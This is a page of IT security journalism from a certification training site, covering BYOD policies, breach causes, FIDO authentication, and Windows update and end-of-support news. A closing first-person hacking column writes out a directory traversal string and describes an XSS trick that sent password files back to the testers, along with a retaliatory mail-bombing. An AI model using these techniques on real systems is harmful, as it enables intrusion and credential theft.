Skip to content


MCTS Training, MCTS Certification exams Training at


Tag: Security

You’d think after all this time that organizations would have finally gotten BYOD programs pretty much down pat. Don’t bet on it.

A recent study by tyntec reveals that a vast majority of organizations still have inadequate bring-your-own-device (BYOD) policies. That’s not very encouraging, considering that 49 percent of workers now use a personal mobile device for work-related tasks and spend a great deal of time on personal devices for their job.

Further, the typical U.S. worker now expects to have nothing less than total access – anywhere, anytime, from any device – to their employer’s networks, finds another study from Dell and Intel. But despite all this demand on the user side, many organizations still wrestle with security, privacy and support issues around BYOD. That is holding many employers back when it comes to giving BYOD an enthusiastic ‘thumbs up’.

So what does it take to get BYOD right in 2015? CSO put that question to a few IT leaders, whose collective responses reflect the still wide divide on how BYOD is supported at the IT executive level, possibly depending on the industry in which they work.

An undeniable force

The higher education sector has embraced BYOD probably as much as any. No surprise here, really. College and university culture is all about openness – of ideas, of expression, and of access to resources. So it is only natural that today’s campus environment is awash with personal devices.

The University of Tennessee at Chattanooga is a prime example. According to Thomas Hoover, associate vice chancellor and CIO, and Susan Lazenby, manager of strategic planning and communication, BYOD has taken the campus by storm.

The two shared the school’s experiences with BYOD by stressing the impact it has had on the school’s IT organization, including staff and budget. But they confirmed that BYOD was a trend not to be denied, and the university had no choice but to adopt it. They also noted that a robust BYOD program is not just demanded by students, but also by faculty and employees.

To illustrate how rapidly BYOD caught on at UT, the two noted that five years ago the school’s network was supporting 809 devices. That number rose to 14,906 in 2014. This year it jumped to approximately 48,000.

It’s a similar tale hundreds of miles away at Worcester State University in Massachusetts.
“Like any other institute in higher education, Worcester State doesn’t have any choice but to support BYOD,” notes Anthony (Tony) Adade, CIO at the university. “The students come from diverse backgrounds. They come with all kinds of devices. For several years we’ve been seeing an influx of games on our campus – all kinds of games. Besides the normal devices that we have to deal with, we didn’t have any choice but to support them.”

Like at the University of Tennessee, wide-scale BYOD has been a fairly new phenomenon at Worcester State, but demand quickly made up for lost time.

“Initially it was limited. The network itself was at capacity and was not able to handle the devices coming on campus,” Adade explains. “We had to tell some students that they can’t bring devices on campus or if they did they were on their own. However, later on we realized it would be in our strategic interest to have a plan and to address the issue. Now we can safely accommodate almost every device. “

Colleges and universities aren’t the only organizations that have felt compelled to adopt BYOD programs, of course. Countless companies and nonprofits are also supporting programs, and have learned some important lessons in how to do it right.

“It is important to have technology in-house to support BYOD strategy,” notes Christine Vanderpool, CIO at Molson Coors, one of the nation’s leading brewers. “Companies should invest in tools like MDM, DLP and application monitoring (tools that inform the user of malicious applications on their devices). You need staff to support these tools. You need a strong set of policies, procedures and end user education.”

“It is good to focus on the ‘what’s in it for them’ in most cases,” Vanderpool stresses. “If you deploy MD or application controls, you have to explain how this is protecting them in their daily life and not just in their work life.”

What are the most important elements of an effective BYOD program in terms of both providing employee flexibility and productivity and also ensuring company data and network security? Molson Coors CIO Christine Vanderpool offers the following tips on what should be considered: Identified risks include:

“Give real life examples like how some malicious apps can take control/read all the user’s SMS text messages, see password information entered into a bank app, etc. People care most when they can understand it and can potentially impact their lives beyond just their job,” Vanderpool says.

Not everyone’s a believer

But many CIOs remain skeptics when it comes to supporting BYOD, fearing that the probable risks still outweigh the possible benefits. One of them is Jim Motes, vice president and CIO at Rockwell Automation.

“I’m not really a fan of BYOD phones,” Motes says. “I believe the privacy constraints will be at odds with protecting and controlling corporate intellectual property.”

“The smartphone is not just communication technology, it’s a social lifeline, diary, and entertainment system,” Motes continues. “People have too much personal information stored on these systems and should be very careful about how much access they want to give their employers. Employers should avoid them completely to limit their liability should that personal information be breached and exposed.”

So how does an organization resolve these two competing forces: security and privacy concerns on one hand, versus user demand for convenience on the other?

Our sources offered the following combined tips on how to get BYOD right:

Have a thoughtful strategy
As noted, security remains a top concern for IT leaders when it comes to BYOD. It is therefore important to involve the IT security team in establishing a program from the outset. But the approach should be for the CSO to help find a solution, not reasons to not support it. The focus should be on how to best secure the data first and foremost, then the devices.

Take stock of the situation
Once you’ve set your strategy, begin with assessments of the network capacity and the security status. Issues to consider include how much vulnerability does the network have? Who is connecting to it? What devices and applications are they using?

Have a clear set of policies and expectations
You need a set policy of guidelines on what is allowed and what is not and to guide behavior of employees and users. Policies should be simple and easy to understand. Toward that end, have your employees help draft the policies to get their understanding and support up-front.

Some devices are a ‘go’ and some are a ‘no’
Third, identify the devices you wouldn’t be able to support. The program probably can’t be all things to all employees. Create an approved list of devices that IT will support, providing the employee has a valid business reason for using it. Purchase the devices at a reduced cost for employees, and put necessary safeguards on those devices. Let employees know up front to what degree you will support a particular device purchase.

Proper training is critical
Educate employees on how to connect their devices to the network and also the dos and don’ts of their usage. Lunchtime training sessions are a smart idea. Stress what it is that employees are agreeing to, including what happens if a device is lost or stolen – the wiping of the device. Most employees will say yes, and for those that don’t, they can’t participate in the program.

Finally, “BYOD risks and considerations will continue to grow and change just as rapidly as the technologies change,” stresses Vanderpool. “It is vital that all aspects of the BYOD model be continuously reviewed, updated, re-communicated and employees re-educated. The model deployed and the supporting guidelines, policies and procedures implemented to support it must be agile and allow the company to be able to quickly adapt or change them when necessary.”


Click here to view complete Q&A of 70-243 exam

MCTS Training, MCITP Trainnig

Best Microsoft MCTS Certification, Microsoft 70-243 Training at


IT and security experts discuss the leading causes of security breaches and what your organization can do to reduce them.

Security breaches again made big news in 2014. Yet despite years of headline stories about security leaks and distributed denial-of-service (DDoS) attacks and repeated admonishments from security professionals that businesses (and individuals) needed to do a better job protecting sensitive data, many businesses are still unprepared or not properly protected from a variety of security threats.

Indeed, according to Trustwave’s recent 2014 State of Risk Report, which surveyed 476 IT professionals about security weaknesses, a majority of businesses had no or only a partial system in place for controlling and tracking sensitive data.

So, what can companies do to better protect themselves and their customers’, sensitive data from security threats? queried dozens of security and IT experts to find out. Following are the six most likely sources, or causes, of security breaches and what businesses can, and should, do to protect against them.

Risk No. 1: Disgruntled Employees

“Internal attacks are one of the biggest threats facing your data and systems,” states Cortney Thompson, CTO of Green House Data. “Rogue employees, especially members of the IT team with knowledge of and access to networks, data centers and admin accounts, can cause serious damage,” he says. Indeed, “there [were] rumors that the Sony hack was not [carried out by] North Korea but [was actually] an inside job.

Solution: “The first step in mitigating the risk of privileged account exploitation is to identify all privileged accounts and credentials [and] immediately terminate those that are no longer in use or are connected to employees that are no longer at the company,” says Adam Bosnian, executive vice president, CyberArk.

“Next, closely monitor, control and manage privileged credentials to prevent exploitation. Finally, companies should implement necessary protocols and infrastructure to track, log and record privileged account activity [and create alerts, to] allow for a quick response to malicious activity and mitigate potential damage early in the attack cycle.”

Risk No. 2: Careless or Uninformed Employees

“A careless worker who forgets [his] unlocked iPhone in a taxi is as dangerous as a disgruntled user who maliciously leaks information to a competitor,” says Ray Potter, CEO, SafeLogic. Similarly, employees who are not trained in security best practices and have weak passwords, visit unauthorized websites and/or click on links in suspicious emails or open email attachments pose an enormous security threat to their employers’ systems and data.

Solution: “Train employees on cyber security best practices and offer ongoing support,” says Bill Carey, vice presdient of Marketing for RoboForm. “Some employees may not know how to protect themselves online, which can put your business data at risk,” he explains. So it’s essential to “hold training sessions to help employees learn how to manage passwords and avoid hacking through criminal activity like phishing and keylogger scams. Then provide ongoing support to make sure employees have the resources they need.”

Also, “make sure employees use strong passwords on all devices,” he adds. “Passwords are the first line of defense, so make sure employees use passwords that have upper and lowercase letters, numbers and symbols,” Carey explains.

“It’s also important to use a separate password for each registered site and to change it every 30 to 60 days,” he continues. “A password management system can help by automating this process and eliminating the need for staff to remember multiple passwords.”

Encryption is also essential.

“As long as you have deployed validated encryption as part of your security strategy, there is hope,” says Potter. “Even if the employee hasn’t taken personal precautions to lock their phone, your IT department can execute a selective wipe by revoking the decryption keys specifically used for the company data.”

To be extra safe, “implement multifactor authentication such as One Time Password (OTP), RFID, smart card, fingerprint reader or retina scanning [to help ensure] that users are in fact who you believe they are,” adds Rod Simmons, product group manager, BeyondTrust. “This helps mitigate the risk of a breach should a password be compromised.”
Risk No. 3: Mobile Devices (BYOD)
“Data theft is at high vulnerability when employees are using mobile devices [particularly their own] to share data, access company information, or neglect to change mobile passwords,” explains Jason Cook,CTO & vice president of Security, BT Americas. “According to a BT study, mobile security breaches have affected more than two-thirds (68 percent) of global organizations in the last 12 months.”

Indeed, “as more enterprises embrace BYOD, they face risk exposure from those devices on the corporate network (behind the firewall, including via the VPN) in the event an app installs malware or other Trojan software that can access the device’s network connection,” says Ari Weil, vice president, Product Marketing, Yottaa.

Solution: Make sure you have a carefully spelled out BYOD policy. “With a BYOD policy in place, employees are better educated on device expectations and companies can better monitor email and documents that are being downloaded to company or employee-owned devices,” says Piero DePaoli, senior director, Global Product Marketing, Symantec. “Monitoring effectively will provide companies with visibility into their mobile data loss risk, and will enable them to quickly pinpoint exposures if mobile devices are lost or stolen.”

Similarly, companies should “implement mobile security solutions that protect both corporate data and access to corporate systems while also respecting user’s privacy through containerization,” advises Nicko van Someren, CTO, Good Technology. “By securely separating business applications and business data on users’ devices, containerization ensures corporate content, credentials and configurations stay encrypted and under IT’s control, adding a strong layer of defense to once vulnerable a points of entry.”

You can also “mitigate BYOD risks with a hybrid cloud,” adds Matthew Dornquast, CEO and cofounder, Code42. “As unsanctioned consumer apps and devices continue to creep into the workplace, IT should look to hybrid and private clouds for mitigating potential risks brought on by this workplace trend,” he says. “Both options generally offer the capacity and elasticity of the public cloud to manage the plethora of devices and data, but with added security and privacy—such as the ability to keep encryption keys on-site no matter where the data is stored—for managing apps and devices across the enterprise.”

Risk No. 4: Cloud Applications
Solution: “The best defense [against a cloud-based threat] is to defend at the data level using strong encryption, such as AES 256-bit, recognized by experts as the crypto gold standard and retain the keys exclusively to prevent any third party from accessing the data even if it resides on a public cloud,” says Pravin Kothari, founder and CEO of CipherCloud. “As many of 2014’s breaches indicate, not enough companies are using data level cloud encryption to protect sensitive information.”

Risk No. 5: Unpatched or Unpatchable Devices
“These are network devices, such as routers, [servers] and printers that employ software or firmware in their operation, yet either a patch for a vulnerability in them was not yet created or sent, or their hardware was not designed to enable them to be updated following the discovery of vulnerabilities,” says Shlomi Boutnaru, cofounder & CTO, CyActive. “This leaves an exploitable device in your network, waiting for attackers to use it to gain access to your data.

A leading breach candidate: the soon-to-be unsupported Windows Server 2003.

“On July 14, 2015, Microsoft will no longer provide support for Windows Server 2003 – meaning organizations will no longer receive patches or security updates for this software,” notes Laura Iwan, senior vice president of Programs, Center for Internet Security.

With over 10 million physical Windows 2003 servers still in use, and millions more in virtual use, according to Forrester, “expect these outdated servers to become a prime target for anyone interested in penetrating the networks where these vulnerable servers reside,” she says.

Solution: Institute a patch management program to ensure that devices, and software, are kept up to date at all times.

“Step one is to deploy vulnerability management technology to look on your network and see what is, and isn’t, up to date,” says Greg Kushto, director of the Security Practice at Force 3. “The real key, however, is to have a policy in place where everyone agrees that if a certain piece of equipment is not updated or patched within a certain amount of time, it is taken offline.”

To avoid potential problems re Windows Server 2003, “identify all Windows Server 2003 instances; inventory all the software and functions of each server; prioritize each system based on risk and criticality; and map out a migration strategy and then execute it,” Iwan advises. And if you are unable to execute all steps in house, hire someone certified to assist you.
Risk No. 6: Third-party Service Providers

“As technology becomes more specialized and complex, companies are relying more on outsourcers and vendors to support and maintain systems,” notes Matt Dircks, CEO, Bomgar. “For example, restaurant franchisees often outsource the maintenance and management of their point-of-sale (POS) systems to a third-party service provider.”

However, “these third-parties typically use remote access tools to connect to the company’s network, but don’t always follow security best practices,” he says. “For example, they’ll use the same default password to remotely connect to all of their clients. If a hacker guesses that password, he immediately has a foothold into all of those clients’ networks.”

Indeed, “many of the high profile and extremely expensive breaches of the past year (think Home Depot, Target, etc.) were due to contractor’s login credentials being stolen,” states Matt Zanderigo, Product Marketing Manager, ObserveIT. “According to some recent reports, the majority of data breaches – 76 percent – are attributed to the exploitation of remote vendor access channels,” he says. “Even contractors with no malicious intent could potentially damage your systems or leave you open to attack.”

“This threat is multiplied exponentially due to the lack of vetting done by companies before allowing third parties to access their network,” adds Adam Roth, cybersecurity specialist from Dynamic Solutions International. “A potential data breach typically does not directly attack the most valuable server, but is more a game of leap frog, going from a low level computer that is less secure, then pivoting to other devices and gaining privileges,” he explains.

“Companies do a fairly good job ensuring critical servers avoid malware from the Internet,” he continues. “But most companies are pretty horrible at keeping these systems segmented from other systems that are much easier to compromise.”

Solution: “Companies need to validate that any third party follows remote access security best practices, such as enforcing multifactor authentication, requiring unique credentials for each user, setting least-privilege permissions and capturing a comprehensive audit trail of all remote access activity,” says Dircks.

In particular, “disable third-party accounts as soon as they are no longer needed; monitor failed login attempts; and have a red flag alerting you to an attack sent right away,” says Roth.
General Guidance on Dealing With Breaches

“Most organizations now realize that a breach is not a matter of if but when,” says Rob Sadowski, director of Technology Solutions for RSA. To minimize the impact of a security breach and leak, conduct a risk assessment to identify where your valuable data resides and what controls or procedures are in place to protect it.

Then, “build out a comprehensive incident response [and disaster recovery/business continuity] plan, determining who will be involved, from IT, to legal, to PR, to executive management, and test it.”

MCTS Training, MCITP Trainnig

Best Microsoft MCTS Certification, Microsoft MCITP Training at

Expect a rush of vendors to adopt the a simple, secure authentication scheme that might do away with passwords

Vendors of mobile devices are lining up to implement an authentication scheme meant to make online transactions both simpler and more secure, known as the Fast Identity Online (FIDO) specification, which is being released today.

Within a year there could be 20 to 30 vendors integrating FIDO in shipping products, says Michael Barrett, who heads up the FIDO Alliance, an industry group of more than 150 members that has written the specification.

This would greatly expand the handful of vendors and service providers who have so far been using the technology in its pre-spec incarnation to authenticate mobile users. The goal is to make FIDO more widely used by consumers, service providers and enterprises to reduce reliance on vulnerable usernames and passwords in favor of two-factor authentication, Barrett says.

The final implementation specification announced today means anyone interested in using FIDO has a solid ground on which to base it. Until now some parties have been jumping in using a preliminary FIDO-Ready spec that was subject to change depending on what the final version looked like.

The FIDO Alliance includes among its members some large and influential vendors, service providers and enterprises, including Google, PayPal, Bank of America, Wells Fargo, Microsoft, RSA, VISA, Discover, MasterCard, Lenovo and Alibaba.

The final specification describes two elements, a universal authentication framework (UAF) and a universal second factor (U2F) that together can ultimately eliminate usernames and passwords and so the risk that they are hacked, says Barrett.

UAF allows users to show a biometric – fingerprint, voiceprint, face recognition – that authenticates them to their devices. A client on the devices then completes a secure connection to FIDO servers using UAF protocol that includes encrypting the transaction using a private key generated by and stored on the device. A public key sent to the server decrypts the client’s response to complete the authentication.

U2F is a small, one-time password dongle that can be inserted into the client machine. Users authenticate to servers using username and password and are prompted to use the dongle inserted in a USB port on their machines as a two-factor second layer of authentication. Next year the dongles will support not only USB but also Bluetooth, near field communications (NFC) and LTE wireless technologies as well, Barrett says.
120914 fido

The long-term goal of FIDO is to eliminate usernames and passwords altogether, but if they choose to and have appropriately equipped machines users can immediately use biometrics instead.

Already some entities are employing FIDO client-server technology to protect online transactions. Samsung (Galaxy S5) and Lenovo have installed the clients on some of their phones and laptops that have fingerprint readers. PayPal has implemented a FIDO server to support authentication for online transactions. Google has implemented support for U2F it in its Chrome browser, and Google users can use it to securely login to their Google accounts.

Vendors have stepped up to supply FIDO hardware and software to those who don’t want to do the work themselves. For example Nok Nok Labs sells FIDO clients and servers that are used by PayPal as well as Alipay, and Yubico sells FIDO dongles.

At $50 or less, the dongles are less expensive than security tokens costing hundreds of dollars that generate new authentication codes at set intervals and are synched with authentication servers. The dongles may not be as secure, but they are more secure than simple username and password.

MCTS Training, MCITP Trainnig

Best Microsoft MCTS Certification, Microsoft MCITP Training at


Mandates Windows 8.1 Update to receive future patches; evidence of commitment to constant OS refreshes, say experts

Microsoft’s demand that Windows 8.1 users install this week’s major update was another signal that the company is very serious about forcing customers to adopt its faster release strategy, experts said today.

“Microsoft is going to drag organizations and users into this new world of faster updates kicking and screaming,” said Michael Silver of Gartner in an email. “Microsoft wants users to trust it to keep their systems updated. Maybe they figure forcing organizations to deploy [Windows 8.1 Update] will get them used to taking updates and keeping current.”

Earlier this week, Microsoft shipped Windows 8.1 Update (8.1U), adding that to obtain future updates, including fixes for vulnerabilities distributed each month on “Patch Tuesday,” Windows 8.1 users had to install 8.1U.

“Failure to install this Update will prevent Windows Update from patching your system with any future updates starting with updates released in May 2014,” Microsoft said.

May 13 is the first Patch Tuesday that will require 8.1U.

That requirement got the attention of users. And not in a good way.

“What happened to Microsoft’s Lifecycle policy with providing customers with a 24-month timeframe before ending support of a superseded operating system RTM/Service Pack?” asked a user identified as “wdeguara” in a comment appended Tuesday to Microsoft’s blog-based announcement. “By immediately withdrawing all future security updates for Windows 8.1 RTM, in the eyes of most enterprise customers you are effectively performing an immediate End-of-Life on Windows 8.1 RTM.

“I know that Microsoft wants its customer base to adopt updates to its Windows platform faster, but immediately dropping security patching on the Windows 8.1 RTM release is just plain crazy,” wdeguara added.

But to Silver, that is exactly Microsoft’s intent.

Others see similar method to Microsoft’s madness.

“The reality is that Microsoft is moving the OS toward a more service-oriented model,” said Wes Miller, an analyst with Directions on Microsoft, in a Thursday telephone interview. “This reflects the fact that there are shifting sands, that Microsoft is trying to move toward one servicing model for a variety of platforms. They’re trying to harmonize Windows Phone and Windows with one servicing model that works for everyone.”

From Miller’s perspective, Microsoft was striving for a mobile-style model for Windows that would not only rely on more frequent updates, but one with a goal of getting the bulk of users onto each new this-is-current update or version.

Other Microsoft customers joined wdeguara to criticize the forced migration, which had not been announced prior to Tuesday and which they saw as a betrayal of the 24-month rule that has given them two years from the launch of a service pack to upgrade from the original, called “RTM” in Microsoft-speak to reference “release to manufacturing.”

“This is a massive shift from a patching perspective,” said Julian Harper, an IT manager, in one of several messages posted to the mailing list on the topic. “For years, we’ve had [two] years to plan service pack roll outs and now we’re given one month. And this is on top of the fiasco that was Windows 8.1 for volume license customers.”

Previously, Microsoft had said that the 24-month rule for Windows, once reserved for service packs, would apply to Windows 8 and its successors, including Windows 8.1 of October 2013, even though the latter was not labeled as a “service pack.” Customers on Windows 8 RTM, which shipped in October 2012, would have until Jan. 12, 2016 to migrate to Windows 8.1. After that date, Windows 8 RTM will not be eligible for security updates and other fixes and enhancements.

“Microsoft has the most generous and transparent support policies, but everything depends on what they call the new code,” said Silver. “A ‘service pack’ has a support policy. A ‘version’ has a support policy. Something with a different name, well, Microsoft can do what it wants.”

Miller wasn’t shocked at the complaints from enterprise IT personnel, like Harper. “It bothered me, too,” Miller said. “The support lifecycle page doesn’t reflect this, and it absolutely should,” he continued, referring to Microsoft’s support timetable for Windows 8 and Windows 8.1. “Customers need to be able to keep track of what they have to do for support.”

Andrew Storms, director of DevOps at CloudPassage, a San Francisco-based cloud security firm, acknowledged the historic nature of the Windows 8.1 Update’s deployment requirement.

“What was surprising to me was that there was no prior notification from Microsoft,” Storms said. “But what was not so surprising was that they made this decision. The number of SKUs that they support is getting out of hand. Microsoft can only support so many products. At some point, they just have to cut it.”

Storms sympathized with corporate IT administrators nervous about the rapid release pace.

“Given the environment they’re in, the complaints were well justified,” Storms said. Traditionally, that has been an environment where companies downloaded an update, tested it for weeks or even months, then slowly deployed it to devices.

“That’s an ongoing process that’s constantly in motion,” said Storms of the practice. “But we know everyone needs to move to [a process] where you have to take the updates as they are. So this really calls for a new way of thinking. IT must rethink the environment that they’re in.”

In other words, enterprises may not like Microsoft mandating 8.1U but they’ll have to learn to live with not only that, but future demands, too. “If the [software vendors] are moving faster than you can keep up with using the traditional methodology, you’re going to have to just take [the updates],” Storms said.

Microsoft did not reply to questions, including why it mandated 8.1U and whether it believed the requirement is a change of its 24-month rule.

MCTS Training, MCITP Trainnig

Best Microsoft MCTS Certification, Microsoft MCITP Training at



Microsoft and its hardware partners really, really want everyone to abandon Windows XP by April 8. But the world won’t end if you don’t.

It’s the end of an era at Microsoft. No, I’m not talking about CEO Steve Ballmer retiring and being replaced by Satya Nadella, though that also qualifies. I’m referring to the imminent “death” of support for Microsoft’s long-running Windows XP operating system.

Microsoft — and its hardware partners like HP, Dell, and many others — really, really, really want you and everyone else to upgrade to Windows 8.1, or at least Windows 7. In hopes that Windows XP upgrades will save the PC industry, they’re pulling out all the stops, from warning of potential security catastrophes to offering discounts and special financing on new hardware, along with a wide variety of assessment tools and migration services designed to ease the process. They’re even inviting small groups of journalists to dinner to discuss the issue!

Is April 8 the new Y2K?
The efforts seem to be working for enterprises. Jordan Chrysafidis, Microsoft’s vice president of OEM worldwide marketing, said that only 10% of enterprises in the developed world still use XP exclusively — although he also said that 24% of small businesses don’t even know that XP is reaching its end-of-service date. Either way, though, its pretty clear that not everyone is going to upgrade by the April 8 support cut-off.

Like other tech scares dating back to Y2K, that may not cause an immediate disaster.
Don’t get me wrong, I’m totally behind the upgrade push. Windows XP is ancient, and no longer delivers a state-of-the-art computing experience — it was designed long before touch and the cloud and mobility and virtualization and modern management techniques took center stage. XP users can’t hope to take advantage of modern trends and cope with today’s threats.

But that’s the point. Failing to upgrade from Windows XP is more about forgoing the advantages of modern technology than it is about some arbitrary doomsday. Things aren’t going to be dramatically different for XP users on April 9 than they were on April 7 — though they’re likely to get worse over time. It’s just that XP users will be leaving the promise of the 21st Century on the table.

According to Chrysafidis, for example, one recent study showed that upgrading to Windows 7 or 8.1 can save $700 per year per user — one more argument for using a modern OS. But it’s also hardly an imperative to make the switch by any specific date, or for every machine in every application to be instantly upgraded.

XP is everywhere
Windows XP was incredibly popular and remains deeply ingrained in machines of all types used for all sorts of purposes. (Heck, I’ve still got an old netbook running XP.) XP is found in millions of small business, retail outlets, and factory floors, and the upgrade usually isn’t just swapping in a new operating system. In many cases, you’ll need brand new hardware and have to upgrade proprietary apps that don’t work on other versions of Windows (most packaged apps are compatible). That’s simply not top of mind — or budget — for many users and organizations. Again, the new hardware is going to be way better, cheaper, and more reliable than the old XP boxes it replaces, but you already own the XP machines, so that’s not always a useful comparison.

As Chrysafidis pointed out, upgrading from XP is a great opportunity to remake outmoded business processes as well as replace hardware and software. But that’s a big deal that requires serious planning — it doesn’t make sense to tackle a major project like that on Microsoft’s timetable. Waiting carries risks — security breaches or aging hardware giving up the ghost at an inopportune moment — but so does rushing into an upgrade process you’re not ready for or can’t afford.

No excuse not to upgrade
Yes, you’re going to have to upgrade from Windows XP, and sooner is better than later. But if you ask me, it’s more important to do it right than to do it fast. Far better to leverage the opportunity to truly take advantage of what modern technology has to offer than scramble to meet the April 8 deadline just to end up doing the same old things on a shiny new PC with a shiny new operating system. (As long as you don’t get hacked in the meantime, of course.)

MCTS Training, MCITP Trainnig

Best Microsoft MCTS Certification, Microsoft MCITP Training at



Google X may have announced its smart contact lens project, but Microsoft Research says it worked on it first.

Do you recall how Microsoft claimed it invented, or invisibly runs, practically everything? Along those lines, Microsoft Research is claiming partial credit for the smart contact lens project that Google unveiled last week.Microsoft’s hand in inventing Google’s glucose-sensing contact lens

Google announced that it was testing smart contact lens that has “chips and sensors so small they look like bits of glitter, and an antenna thinner than a human hair.”

We’re now testing a smart contact lens that’s built to measure glucose levels in tears using a tiny wireless chip and miniaturized glucose sensor that are embedded between two layers of soft contact lens material. We’re testing prototypes that can generate a reading once per second. We’re also investigating the potential for this to serve as an early warning for the wearer, so we’re exploring integrating tiny LED lights that could light up to indicate that glucose levels have crossed above or below certain thresholds. It’s still early days for this technology, but we’ve completed multiple clinical research studies which are helping to refine our prototype. We hope this could someday lead to a new way for people with diabetes to manage their disease.

After Google’s announcement, Desney Tan, a Principal Researcher at Microsoft Research, was bombarded with questions about his “long-time friends and colleagues Babak Parviz and Brian Otis who declared “their intent to develop a glucose-sensing contact lens.” Tan’s “inbox and voicemail are stuffed with calls for comments and queries about the relationship of this project to the one Microsoft Research worked on with Babak and Brian a few years ago.”

So Tan wrote:
As background, my team and I here at Microsoft Research had the pleasure of supporting and working with Babak and Brian and a number of other collaborators very early in this project. Babak and Brian were still full-time faculty at the University of Washington. In our collaboration, we demonstrated the feasibility not only of embedding displays in the contact lenses, but more importantly, of glucose sensing as well. As one would imagine, we tackled numerous hard problems around miniaturization, wireless power, wireless communications and biocompatibility.

What’s occurred here is a great example of why we and others must continue to invest in basic research, pushing the boundaries of science and technology in an effort to improve the lives of as many people as possible. Most of the time here at Microsoft, we do this in partnership with our business group colleagues, who can take direct advantage of our work and deliver it directly to our customers. But there are other instances where we do this through partners, and sometimes even through competitors. Our open research and deeply collaborative model allows us to work with the best academic and industrial researchers around the world, and we will continue to do so as we certainly believe in the philosophy that “we” is smarter than “me.” This open approach to working with and through others has consistently delivered outsized rewards for Microsoft and for the world at large.

I’m not faulting Tan, more power to him, just pointing out that Microsoft apparently had a hand in Google’s glucose-sensing contact lens. After all, Microsoft has taken credit for inventing, or its software invisibly running, almost everything. To be fair, Microsoft Research has over 1,100 researchers who work on everything from privacy and security to healthcare.

In fact, Microsoft Research recently adopted an Open Access policy for all research publications.

Microsoft Research is committed to disseminating the fruits of its research and scholarship as widely as possible because we recognize the benefits that accrue to scholarly enterprises from such wide dissemination, including more thorough review, consideration and critique, and general increase in scientific, scholarly and critical knowledge.

Like Microsoft, Google has a lot of power and money. However, unlike Microsoft Research, most of the “moonshot” research that goes on inside Google X, “Google’s secret lab,” is hush-hush . . . at least until the company decides to shock the world with its projects like Google Glass and the Google driverless car.

In the end, if you have diabetes and someone invents something to help you out, then you might not care whether it is Microsoft or Google in your eye.

Comptia A+ Training, Comptia A+ certification

Best comptia A+ Training, Comptia A+ Certification at


True tales of (mostly) white-hat hacking
Stings, penetration pwns, spy games — it’s all in a day’s work along the thin gray line of IT security

In the mainstream media, hacking gets a bum rap. Sure, the headline grabbers are often nefarious, but all computer professionals are hackers at heart. We all explore the systems we use, often reaching beyond their normal intent. This knowledge and freedom can come through big time in sticky situations.

In my three decades fighting malicious hackers, I’ve come to rely heavily on that desire to scratch an itch. Improvisation and familiarity with computing systems are essential when combating those who will do almost anything to compromise your network.

[ Verse yourself in 14 dirty IT security consultant tricks, 9 popular IT security practices that just don’t work, and 10 crazy security tricks that do. | Find out how to block the viruses, worms, and other malware that threaten your business, with hands-on advice from expert contributors in InfoWorld’s PDF guide. | Keep up with key security issues with InfoWorld’s Security Central newsletter. ]

Some call it white-hat hacking. I call it a good day’s work — or weekend fun, depending on whether it’s at home or business.

Here are five true tales of bringing down the baddies. I can’t say I’m proud of all the things I did, but the stories speak for themselves. Got one of your own to pass along? Send it my way, or share it in the comments.

True tale of (mostly) white-hat hacking No. 1: Disney, porn, and XSS
Cross-site scripting (XSS) continues to be the No. 1 problem plaguing websites, even today. XSS vulnerabilities arise when a website allows another entity to post Web scripting commands that can then be viewed and executed by others.

Oftentimes, these vulnerabilities fly under the radar. Simply offering users the ability to post comments is enough, if your site allows script commands to be posted, viewed, and executed. A malicious party writes a malicious scripting command that is then consumed and acted upon by other visitors to your site.

When asked why you should worry about cross-site scripting attacks, I like to tell the following story, although the XSS scripting part was just one piece of a great week of hacking.

I was working at a well-known computer security company at the time, and we had been hired to perform penetration testing on an IP TV device that a large cable company was considering producing. Our mission was to find vulnerabilities in the set-top box, especially if any of those vulnerabilities could lead to stealing porn for free, posting porn to, say, the Disney channel, or leaking private customer or company information.

Two coworkers and I were set up in a computer room within one of the cable company’s remote offices. Our attack targets consisted of two televisions, two cable modems, and two new set-top cable boxes (the intended testing target). We were connected to a cable TV broadband connection in such a way that no one else would know the difference between our setup and any normal customer. We then played porn on one TV and Disney movies on the other.

Three guys sitting in a room, hacking away, watching porn, and getting paid to do it — life was good. The only thing missing was the beer. In short order, using a port scanner, I had found a Web server running on a high TCP port, in the neighborhood of 5390. I ran Nikto, a Web vulnerability finder, and it came up with a few false positives. But it also identified the Web server as something I had never heard of. A little research told me it was an open source Web server that had stopped being supported nearly a decade before.

I wondered how likely it was that an old Web server was patched against vulnerabilities that were common 10 years ago. My hunch was correct. I was able to access the set-top box using a simple directory traversal attack (such as http://..//..//..//). I was in as root and had complete control of the device. It was running an old flavor of BSD, which was full of vulnerabilities by itself. In short order, we were able to steal porn, steal credit card numbers, and switch the Disney channel out with porn. We had accomplished all our goals, only a few hours in.

Later that week I learned that my success with a directory traversal attack would find its way up to the cable company’s CSO and beyond. I was invited to talk about my finding ahead of the official written report. Many of the company’s bigwigs flew in for the meeting. When I asked why all the hullabaloo for something they could fix in the new set-top box, I learned that the same Web server and setup was being used in millions of existing cable boxes around the world. I did a scan of the Internet looking for the high TCP port and found tens of thousands of them awaiting anyone’s connection and hacking attempt.

That wasn’t even the highlight — at least to our penetration-testing team. While attacking the set-top box, we found it contained an HTML firewall log, which had an XSS vulnerability. The log would record all Web packet content details after we raised its debug level. Then we crafted an attack packet containing malicious JavaScript and called the cable company’s tech support number.

Posing as a regular customer, we complained that we thought someone was attacking our cable box and asked if the technician could take a look at our device’s firewall log to confirm. A few minutes later up popped the technician’s shadow and passwd password files. When executed, our encoded malicious JavaScript packet would look for various password and configuration files and, if found, send them back to us. The technician had viewed the firewall log, the XSS had launched, and we ended up with the company’s enterprise-wide root password. All of this hacking occurred in about six hours. In less than a day we had fatally compromised the set-top box and pwned the whole company.

That’s nothing to say about the hardware mods and component fires we caused during the ensuing days of boredom because we had nothing else to do but wait for our scheduled plane rides back home.

It was pure joy — and one of the most fun hacking days in my life.

True tale of (mostly) white-hat hacking No. 2: Spamming the persistent porn spammer
Some white-hat hacking walks a thin line. Here’s a great example of “white-hat hacking” of a vigilante nature gone somewhat awry.

Back in the late 1980s, when I was using an email client called Lotus cc:Mail, my work email address had found its way to a porn spammer, and he began to load my inbox with enticements. After five of them came through in a couple of minutes, I decided to take a look at the email header. Back then, spammers didn’t hide as much, and the header revealed the spammer’s true domain name. Using a reverse lookup, I found the hacker’s name, address, and work email address from his domain’s DNS registrar.

I sent a polite email asking to be removed from the spammer’s email list. He replied that there’s nothing he could do and followed up with 10 more porn spams. This ticked me off, so I created a mailbox rule to send right back at him 100 copies of any porn spam message he shot my way. Naturally, this only incited him to fire off even more spam and a personal email indicating that he was sharing my email address with other spammers.

